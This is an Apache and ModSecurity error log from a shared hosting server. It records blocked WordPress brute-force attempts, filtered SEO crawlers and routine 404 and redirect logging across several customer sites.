[Tue May 26 17:37:29.979174 2026] [security2:error] [pid 912729:tid 912813] [remote 27.64.18.54:39414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.18.64.27.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWNAUoCupl_NMj3qz9xQQAApFM"]
[Tue May 26 17:37:31.337939 2026] [security2:error] [pid 912729:tid 912883] [client 185.191.171.12:32420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-14-18/list/"] [unique_id "ahWNA0oCupl_NMj3qz9xjAAAAJ0"]
[Tue May 26 17:37:31.338046 2026] [security2:error] [pid 912729:tid 912883] [client 185.191.171.12:32420] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-14-18/list/"] [unique_id "ahWNA0oCupl_NMj3qz9xjAAAAJ0"]
[Tue May 26 17:37:31.854231 2026] [security2:error] [pid 912729:tid 912898] [client 114.119.131.139:23333] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWNA0oCupl_NMj3qz9xqQAAAKo"], referer: http://samayikprasanga.in/archive.php?dt=2015-02-01&pn=2
[Tue May 26 17:37:32.529911 2026] [security2:error] [pid 912729:tid 912978] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNBEoCupl_NMj3qz9xuwAAAPo"]
[Tue May 26 17:37:32.986943 2026] [security2:error] [pid 912729:tid 912911] [client 223.235.98.214:11708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNBEoCupl_NMj3qz9x6wAAALc"]
[Tue May 26 17:37:32.987033 2026] [security2:error] [pid 912729:tid 912911] [client 223.235.98.214:11708] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNBEoCupl_NMj3qz9x6wAAALc"]
[Tue May 26 17:37:34.951826 2026] [security2:error] [pid 912729:tid 912901] [client 24.235.12.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNBkoCupl_NMj3qz9yVQAAAK0"], referer: https://www.anujtradingco.com/
[Tue May 26 17:37:35.029059 2026] [security2:error] [pid 912729:tid 912896] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNBkoCupl_NMj3qz9yRAAAAKg"]
[Tue May 26 17:37:35.488656 2026] [security2:error] [pid 912729:tid 912910] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNB0oCupl_NMj3qz9yYQAAALY"]
[Tue May 26 17:37:36.178703 2026] [security2:error] [pid 912729:tid 912920] [client 24.235.12.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNCEoCupl_NMj3qz9yngAAAMA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 17:37:37.315503 2026] [security2:error] [pid 912729:tid 912914] [client 216.73.217.138:42513] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahWNCEoCupl_NMj3qz9yugAAujM"]
[Tue May 26 17:37:37.782541 2026] [security2:error] [pid 912729:tid 912936] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNCUoCupl_NMj3qz9y5wAAANA"]
[Tue May 26 17:37:40.176763 2026] [security2:error] [pid 912729:tid 912943] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNC0oCupl_NMj3qz9zbwAAANc"]
[Tue May 26 17:37:42.488990 2026] [security2:error] [pid 912729:tid 912897] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNDkoCupl_NMj3qz9z8gAAAKk"]
[Tue May 26 17:37:43.479240 2026] [security2:error] [pid 912729:tid 912859] [client 223.235.98.214:21674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWND0oCupl_NMj3qz90OAAAAIU"]
[Tue May 26 17:37:43.479355 2026] [security2:error] [pid 912729:tid 912859] [client 223.235.98.214:21674] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWND0oCupl_NMj3qz90OAAAAIU"]
[Tue May 26 17:37:44.850174 2026] [security2:error] [pid 912729:tid 912874] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNEEoCupl_NMj3qz90cgAAAJQ"]
[Tue May 26 17:37:45.152505 2026] [security2:error] [pid 912729:tid 912897] [client 151.245.177.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNEUoCupl_NMj3qz90oAAAAKk"], referer: https://www.anujtradingco.com/
[Tue May 26 17:37:46.315965 2026] [security2:error] [pid 912729:tid 912900] [client 151.245.177.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNEkoCupl_NMj3qz903QAAAKw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 17:37:47.136216 2026] [security2:error] [pid 912729:tid 912894] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNEkoCupl_NMj3qz90-QAAAKY"]
[Tue May 26 17:37:49.661512 2026] [security2:error] [pid 912729:tid 912982] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNFUoCupl_NMj3qz91fgAAAP4"]
[Tue May 26 17:37:52.503068 2026] [security2:error] [pid 912729:tid 912930] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNGEoCupl_NMj3qz92MAAAAMo"]
[Tue May 26 17:37:53.053549 2026] [security2:error] [pid 912729:tid 912927] [client 8.213.134.145:50286] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cargo-pulse.info"] [uri "/"] [unique_id "ahWNGUoCupl_NMj3qz92aQAAAMc"]
[Tue May 26 17:37:53.408603 2026] [security2:error] [pid 912729:tid 912939] [client 14.164.125.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNGEoCupl_NMj3qz92ZQAAANM"]
[Tue May 26 17:37:53.953485 2026] [security2:error] [pid 912729:tid 912931] [client 223.235.98.214:26827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNGUoCupl_NMj3qz92nwAAAMs"]
[Tue May 26 17:37:53.953589 2026] [security2:error] [pid 912729:tid 912931] [client 223.235.98.214:26827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNGUoCupl_NMj3qz92nwAAAMs"]
[Tue May 26 17:37:54.464594 2026] [security2:error] [pid 912729:tid 912958] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNGkoCupl_NMj3qz92rAAAAOY"]
[Tue May 26 17:37:55.898954 2026] [security2:error] [pid 912729:tid 912938] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNG0oCupl_NMj3qz93EAAAANI"]
[Tue May 26 17:37:58.306420 2026] [security2:error] [pid 912729:tid 912904] [client 172.86.66.156:55988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWNHkoCupl_NMj3qz93tAAAALA"], referer: https://www.cagmedya.com/
[Tue May 26 17:37:58.306556 2026] [security2:error] [pid 912729:tid 912904] [client 172.86.66.156:55988] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWNHkoCupl_NMj3qz93tAAAALA"], referer: https://www.cagmedya.com/
[Tue May 26 17:37:58.788959 2026] [security2:error] [pid 912729:tid 912939] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNHkoCupl_NMj3qz93wwAAANM"]
[Tue May 26 17:38:00.556876 2026] [security2:error] [pid 912729:tid 912919] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNIEoCupl_NMj3qz94PAAAAL8"]
[Tue May 26 17:38:02.987605 2026] [security2:error] [pid 912729:tid 912758] [remote 165.22.95.96:33436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNIkoCupl_NMj3qz941wAAzhw"]
[Tue May 26 17:38:03.447711 2026] [security2:error] [pid 912729:tid 912925] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNI0oCupl_NMj3qz945AAAAMU"]
[Tue May 26 17:38:03.963312 2026] [security2:error] [pid 912729:tid 912901] [client 23.158.233.122:59620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWNI0oCupl_NMj3qz95FwAAAK0"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 17:38:03.963441 2026] [security2:error] [pid 912729:tid 912901] [client 23.158.233.122:59620] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWNI0oCupl_NMj3qz95FwAAAK0"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 17:38:04.223549 2026] [autoindex:error] [pid 912729:tid 912920] [client 205.210.31.8:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:38:04.486601 2026] [security2:error] [pid 912729:tid 912959] [client 223.235.98.214:32046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNJEoCupl_NMj3qz95PQAAAOc"]
[Tue May 26 17:38:04.486777 2026] [security2:error] [pid 912729:tid 912959] [client 223.235.98.214:32046] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNJEoCupl_NMj3qz95PQAAAOc"]
[Tue May 26 17:38:04.555718 2026] [security2:error] [pid 912729:tid 912935] [client 23.158.233.122:59658] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWNJEoCupl_NMj3qz95OQAAAM8"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 17:38:05.135881 2026] [security2:error] [pid 912729:tid 912978] [client 114.119.129.237:23395] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/regalia"] [unique_id "ahWNJUoCupl_NMj3qz95ZAAAAPo"], referer: https://www.athelstan.org.in/regalia?lightbox=dataItem-k8kc7r9l
[Tue May 26 17:38:05.342494 2026] [security2:error] [pid 912729:tid 912947] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNJEoCupl_NMj3qz95WgAAANs"]
[Tue May 26 17:38:07.482004 2026] [security2:error] [pid 912729:tid 912921] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNJ0oCupl_NMj3qz951QAAAME"]
[Tue May 26 17:38:10.792209 2026] [security2:error] [pid 912729:tid 912875] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNKkoCupl_NMj3qz96jAAAAJU"]
[Tue May 26 17:38:12.416276 2026] [security2:error] [pid 912729:tid 912869] [client 45.154.98.38:64358] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWNLEoCupl_NMj3qz96_wAAAI8"]
[Tue May 26 17:38:12.935579 2026] [security2:error] [pid 912729:tid 912944] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNLEoCupl_NMj3qz97BAAAANg"]
[Tue May 26 17:38:13.071045 2026] [security2:error] [pid 912729:tid 912883] [client 167.160.74.41:25717] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWNLEoCupl_NMj3qz97DQAAAJ0"], referer: https://anujtradingco.com
[Tue May 26 17:38:14.926273 2026] [security2:error] [pid 912729:tid 912937] [client 223.235.98.214:15306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNLkoCupl_NMj3qz97mAAAANE"]
[Tue May 26 17:38:14.927348 2026] [security2:error] [pid 912729:tid 912937] [client 223.235.98.214:15306] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNLkoCupl_NMj3qz97mAAAANE"]
[Tue May 26 17:38:15.236562 2026] [security2:error] [pid 912729:tid 912874] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNLkoCupl_NMj3qz97iQAAAJQ"]
[Tue May 26 17:38:16.096174 2026] [security2:error] [pid 912729:tid 912966] [client 45.154.98.38:50992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWNL0oCupl_NMj3qz97_wAAAO4"]
[Tue May 26 17:38:16.096367 2026] [security2:error] [pid 912729:tid 912966] [client 45.154.98.38:50992] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "dimensioncorporativa.com.co"] [uri "/xmlrpc.php"] [unique_id "ahWNL0oCupl_NMj3qz97_wAAAO4"]
[Tue May 26 17:38:17.061972 2026] [security2:error] [pid 912729:tid 912959] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNMEoCupl_NMj3qz98JwAAAOc"]
[Tue May 26 17:38:18.796411 2026] [security2:error] [pid 912729:tid 912905] [client 114.119.158.220:21049] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahWNMkoCupl_NMj3qz98swAAALE"]
[Tue May 26 17:38:19.053523 2026] [security2:error] [pid 912729:tid 912861] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNMkoCupl_NMj3qz98vwAAAIc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 17:38:19.934289 2026] [security2:error] [pid 912729:tid 912909] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNM0oCupl_NMj3qz982wAAALU"]
[Tue May 26 17:38:19.979430 2026] [security2:error] [pid 912729:tid 912866] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNM0oCupl_NMj3qz98_wAAAIw"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 17:38:20.857841 2026] [security2:error] [pid 912729:tid 912867] [client 216.73.161.122:34831] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWNNEoCupl_NMj3qz99GAAAAI0"]
[Tue May 26 17:38:21.959803 2026] [security2:error] [pid 912729:tid 912942] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNNUoCupl_NMj3qz99WwAAANY"]
[Tue May 26 17:38:23.485474 2026] [security2:error] [pid 912729:tid 912794] [remote 40.77.167.77:45194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 77.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWNN0oCupl_NMj3qz99xgAA-UA"]
[Tue May 26 17:38:24.620111 2026] [security2:error] [pid 912729:tid 912966] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNOEoCupl_NMj3qz999QAAAO4"]
